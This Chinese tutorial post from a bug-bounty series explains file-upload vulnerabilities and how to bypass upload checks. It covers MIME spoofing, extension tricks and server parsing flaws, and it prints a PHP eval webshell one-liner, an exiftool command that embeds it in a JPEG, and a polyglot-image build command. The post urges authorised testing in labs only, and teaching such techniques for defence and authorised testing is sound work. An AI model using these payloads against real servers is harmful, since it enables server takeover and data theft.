【SRC漏洞挖掘系列】第04期:文件上传与解析——把图片变成“特洛伊木马”

上期回顾 :我们刚用 SQL 注入把数据库翻了个底朝天。本期我们来聊聊更暴力的漏洞------文件上传

如果说 SQL 注入是"偷",那文件上传就是直接往人家服务器里安炸弹。💣


一、为什么文件上传是"高危"?

在 SRC 评级里,**GetShell(拿到服务器权限)**​ 通常是最高级(Critical)。

而文件上传,是实现 GetShell 最直接的捷径。

理想情况

一句话木马-> 上传成功 -> 菜刀/蚁剑连接 -> 控制服务器。

现实情况

一句话木马-> WAF 拦截(非法字符) -> 服务器重命名 -> 文件被放到无法执行的目录。

所以,我们需要"骗"过服务器。


二、绕过前端的"纸老虎"

很多开发以为在前端做个 JS 校验就安全了,这叫掩耳盗铃

1. 场景还原

网页 JS 代码:

javascript 复制代码
if (file.type != "image/jpeg") {
    alert("只允许 JPG 图片!");
    return false;
}

2. 绕过姿势

  • 禁用 JS:浏览器按 F12,把 JS 禁了,随便传。

  • 改包 :先把马改成 .jpg上传,用 Burp Suite 抓包,再把文件名改回 .php

  • 控制台修改:在 Console 里直接删掉校验函数。

SRC 提示 :这种漏洞一般评 低危,因为稍微有点安全意识的厂商都会做后端校验。


三、绕过后端校验的"攻防战"

这是实战中最精彩的部分。

1. MIME 类型绕过(Content-Type)

后端代码逻辑 :只允许 image/jpeg

绕过

抓包修改:

http

复制代码
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg  <-- 重点在这里,伪装成图片

2. 黑名单绕过(老版本的噩梦)

如果后端禁止 .php, .asp, .jsp

试试这些冷门后缀(Windows/IIS):

  • shell.php5

  • shell.phtml

  • shell.asp;.jpg(IIS 6.0 经典漏洞,分号截断)

3. 大小写与双写

  • 大小写.PhP(Linux 区分大小写,但有些中间件配置不严谨)。

  • 双写shell.pphphp(过滤 php时,删除第一个 php,剩下 php)。


四、解析漏洞:给服务器"洗脑"

有时候你上传的是 .jpg,但服务器却把它当成 .php来执行。这就是解析漏洞

1. Apache 解析漏洞

原理:Apache 是从右往左解析后缀的。

  • 文件名:shell.php.jpg

  • 解析顺序:.jpg不认识 -> 继续往左 -> .php认识 -> 当成 PHP 执行

2. IIS 6.0 经典姿势

  • 目录解析/test.asp/shell.jpg(只要文件夹叫 .asp,里面的文件不管啥后缀都执行)。

  • 文件解析shell.asp;.jpg(分号截断)。

3. Nginx 解析漏洞(CVE-2013-4547)

Payloadshell.jpg\0.php

解释 :Nginx 看到 \0(空字符)截断,认为后面是 .php,于是交给 FastCGI 处理,结果执行了前面的 JPG 内容。


五、实战演练:制作"图片马"

很多时候,服务器会检查文件内容(魔术头),不是 JPEG 格式直接拦截。

制作步骤(Kali Linux / CMD)

bash 复制代码
# 将一句话木马追加到正常图片末尾
copy /b normal.jpg + shell.php evil.jpg

或者用 Exiftool:

bash 复制代码
exiftool -Comment="<?php @eval($_POST['cmd']); ?>" normal.jpg -o shell.jpg

结果

  • 文件头是 JFIF(图片),骗过后端校验。

  • 文件尾是 <?php ... ?>,服务器解析时执行代码。

连接测试

上传成功后,访问 http://target.com/uploads/evil.jpg

用蚁剑连接,成功 GetShell!🎉


六、SRC 报告中的"坑"

  1. 无解析 :你传了个 shell.php,但它在 /uploads/目录下,没有执行权限。结果:厂商可能忽略,或者评为"无效"。

  2. 自包含 :你传了个文件,但无法访问路径(不知道存哪了)。结果:无法证明危害,评级降低。

报告技巧

一定要截图证明 "能够执行系统命令" (如 whoami),而不仅仅是"文件传上去了"。


七、互动与思考

绕过姿势 适用场景 成功率
前端禁用JS 弱智站点 90%
MIME 绕过 仅校验 Content-Type 60%
图片马+解析漏洞 强校验文件内容 极高

💬 互动话题

各位老司机,你们当年第一次 GetShell 是用什么姿势?是经典的 phpinfo()探针,还是直接 system('calc')弹计算器装逼?😎


⚠️ 法律红线警示

  1. 严禁在未授权服务器上传 Webshell、挖矿病毒或任何形式的恶意软件。

  2. 严禁利用 GetShell 权限查看、下载或篡改服务器内的用户数据(这是犯罪!)。

  3. 测试原则 :证明可以执行 phpinfo()或简单的 echo命令即可,立即停止,切勿进一步深入。

  4. 靶机练习 :请在本地搭建 Upload-LabsDVWA​ 等靶场进行练习。

    **技术是把双刃剑,拿剑的手决定了它是凶器还是护盾。请务必守住法律底线。**​ 🛡️

下一期,我们将进入 "业务逻辑漏洞(上)"。告别代码层面,我们要开始"骗人"了------如何通过修改数据包,把别人的快递改寄到你家?敬请期待!

相关推荐
探索者019 小时前
SQL注入深度解析笔记:从DNSlog外带到高级绕过技术
web安全·sql注入
宋浮檀s9 小时前
SQL注入基础+DVWA搭建
数据库·sql·安全·网络安全
宋浮檀s9 小时前
DVWA通关教程1
网络·安全·web安全
IT大白鼠9 小时前
Dirty Frag漏洞深度分析:Linux内核页缓存污染漏洞的技术原理与安全防护
linux·安全·dirty frag漏洞
祁白_9 小时前
[0xV01D]_Glass Parcel_writeUp
大数据·安全·ctf·writeup
上海知从科技10 小时前
SENT传输协议:汽车传感器数字化通信的最优解决方案
科技·安全·汽车·软件工程·汽车电子
@insist12310 小时前
信息安全工程师-网站安全主动防御体系构建与政务网站合规实践
网络·安全·软考·信息安全工程师·政务·软件水平考试
高翔·权衡之境10 小时前
主题9:DMA与零拷贝——让CPU从数据搬运中解放
驱动开发·安全·缓存·系统安全·信息与通信
L16247610 小时前
Nginx Stream 四层代理 TLS 类漏洞修复完整版
网络·nginx·安全